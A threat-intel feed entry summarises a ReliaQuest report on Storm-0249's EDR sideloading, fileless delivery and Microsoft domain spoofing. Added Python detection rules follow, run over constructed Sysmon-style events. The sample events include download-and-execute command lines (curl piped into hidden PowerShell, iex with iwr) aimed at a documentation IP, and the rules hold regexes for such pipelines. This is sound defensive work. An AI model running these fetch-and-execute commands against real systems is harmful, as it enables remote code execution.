Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation
ID: 26120365-8153-56f1-a71f-032ba8002ec8
STIX ID: report--26120365-8153-56f1-a71f-032ba8002ec8
Feed Name: ReliaQuest Blog
ReliaQuest reports that the initial access broker Storm-0249 has moved from mass phishing to targeted intrusions built on components defenders already trust. The tradecraft described: DLL sideloading through a legitimate, signed process (notably SentinelOne's SentinelAgentWorker.exe), so that attacker code executes inside a binary that security tooling and analysts are inclined to trust; fileless delivery in which curl output is piped straight into PowerShell (curl|PowerShell), so the payload runs in memory and never lands on disk where file-based scanning would see it, leaving command-line and script-block telemetry as the main places to catch it; and spoofing of Microsoft domains. The objective is a persistent, hard-to-detect foothold that can be brokered to ransomware affiliates. The report includes TTP mappings, IOCs (file hashes, domains, IP addresses), recommended detections, and automated response playbooks.
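The three techniques in the summary each leave a distinct telemetry footprint, and the following is an added example of detection logic for them, written for this page rather than taken from the ReliaQuest report or its published detections. It runs over constructed Sysmon-style records (ImageLoad, ProcessCreate and DnsQuery events) that are not indicators from the report; the install directory and code-signing subject assumed for the genuine SentinelOne agent worker, the short list of Microsoft-owned registrable domains, and the homoglyph folding table are all assumptions to be checked against the environment being monitored. The fileless rule goes slightly beyond the page's curl|PowerShell case and also catches the nested PowerShell form (iex (iwr ...)):

```python
"""Detections for the three Storm-0249 techniques named above, run over constructed
Sysmon-style events (ID 7 ImageLoad, ID 1 ProcessCreate, ID 22 DnsQuery).
Illustrative code, not ReliaQuest's; the sample events are not IOCs."""
import ntpath
import re
from typing import Iterable, List, Optional

# Assumption: install directory and code-signing subject of the genuine agent
# worker. Verify both against the deployment actually being monitored.
TRUSTED_HOSTS = {
    "sentinelagentworker.exe": {
        "install_dir": r"c:\program files\sentinelone",
        "signer": "sentinel labs, inc.",
    },
}
OS_DIR = r"c:\windows"  # DLLs under here are OS-provided; the signer check is skipped for them

# Fileless delivery: downloader output piped into an interpreter (curl ... | powershell)
# plus the nested PowerShell form (iex (iwr ...)). Word boundaries stop "irm" from
# matching inside words such as "firmware".
_DL = r"\b(?:curl(?:\.exe)?|wget|invoke-webrequest|iwr|invoke-restmethod|irm)\b"
_EXEC = r"\b(?:powershell(?:\.exe)?|pwsh(?:\.exe)?|iex|invoke-expression)\b"
FILELESS_PIPE = re.compile(_DL + r"[^|]*\|\s*" + _EXEC, re.I)
FILELESS_NESTED = re.compile(r"\b(?:iex|invoke-expression)\b\s*\(+\s*" + _DL, re.I)

# Assumption: partial list of registrable domains Microsoft actually owns.
MICROSOFT_DOMAINS = {"microsoft.com", "microsoftonline.com", "live.com", "office.com", "windows.net"}
_HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s"})


def _under(path_dir: str, root: str) -> bool:
    return path_dir == root or path_dir.startswith(root + "\\")


def check_image_load(ev: dict) -> Optional[str]:
    """ID 7: a trusted EDR binary loads a DLL. Sideloading copies the signed EXE next to a
    planted DLL, so flag a host running outside its install dir and any non-OS DLL that is
    unsigned or signed by someone other than the vendor."""
    name = ntpath.basename(ev["image"]).lower()
    profile = TRUSTED_HOSTS.get(name)
    if profile is None:
        return None
    reasons = []
    image_dir = ntpath.dirname(ev["image"]).lower()
    if not _under(image_dir, profile["install_dir"]):
        reasons.append(f"host running from {image_dir}")
    dll_dir = ntpath.dirname(ev["loaded"]).lower()
    if not _under(dll_dir, OS_DIR):
        if not ev.get("signed"):
            reasons.append(f"unsigned DLL {ev['loaded']}")
        elif ev.get("signer", "").lower() != profile["signer"]:
            reasons.append(f"DLL signed by '{ev['signer']}', not the vendor")
    if not reasons:
        return None
    return f"dll_sideload[{name}]: " + "; ".join(reasons)


def check_process_create(ev: dict) -> Optional[str]:
    """ID 1: a payload fetched and executed in one pipeline never touches disk, so the
    command line (or PowerShell script block logging) is where it has to be caught."""
    cl = ev["cmdline"]
    if FILELESS_PIPE.search(cl) or FILELESS_NESTED.search(cl):
        return "fileless_download_exec: " + cl
    return None


def check_dns(ev: dict) -> Optional[str]:
    """ID 22: a name that reads as Microsoft once common substitutions are folded,
    but whose registrable domain Microsoft does not own."""
    q = ev["query"].lower().rstrip(".")
    labels = q.split(".")
    registrable = ".".join(labels[-2:])  # simplification: ignores multi-label suffixes like .co.uk
    if registrable in MICROSOFT_DOMAINS:
        return None
    folded = q.translate(_HOMOGLYPHS).replace("rn", "m").replace("-", "")
    if "microsoft" in folded:
        return f"microsoft_lookalike: {q} (registrable domain {registrable})"
    return None


def run(events: Iterable[dict]) -> List[str]:
    checks = {7: check_image_load, 1: check_process_create, 22: check_dns}
    hits = []
    for ev in events:
        check = checks.get(ev["id"])
        hit = check(ev) if check else None
        if hit:
            hits.append(hit)
    return hits


# Constructed sample telemetry. 198.51.100.7 is an RFC 5737 documentation address and
# .invalid is a reserved TLD; nothing here is an indicator from the report.
SAMPLE_EVENTS = [
    {"id": 7, "image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "loaded": r"C:\Windows\System32\kernel32.dll", "signed": True, "signer": "Microsoft Windows"},
    {"id": 7, "image": r"C:\Users\Public\Updater\SentinelAgentWorker.exe",
     "loaded": r"C:\Users\Public\Updater\helper.dll", "signed": False, "signer": ""},
    {"id": 1, "cmdline": "cmd.exe /c curl -s http://198.51.100.7/p | powershell -nop -w hidden -"},
    {"id": 1, "cmdline": 'powershell -nop -c "iex (iwr http://198.51.100.7/s -UseBasicParsing)"'},
    {"id": 1, "cmdline": r"powershell -ExecutionPolicy Bypass -File C:\Scripts\nightly.ps1"},
    {"id": 22, "query": "login.microsoftonline.com"},
    {"id": 22, "query": "rnicrosoft-login.com"},
    {"id": 22, "query": "microsoft.com.secure-login.invalid"},
]

if __name__ == "__main__":
    for line in run(SAMPLE_EVENTS):
        print(line)
```

Running the sample yields five findings: the relocated, unsigned-DLL SentinelAgentWorker.exe load, both fileless command lines, and both lookalike queries; the legitimate agent load, the scheduled script, and the genuine microsoftonline.com lookup pass. The sideloading rule deliberately keys on where the host binary runs and what it loads rather than on the binary's own signature, because in this technique the signature is valid: that is the whole point of borrowing a trusted process.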
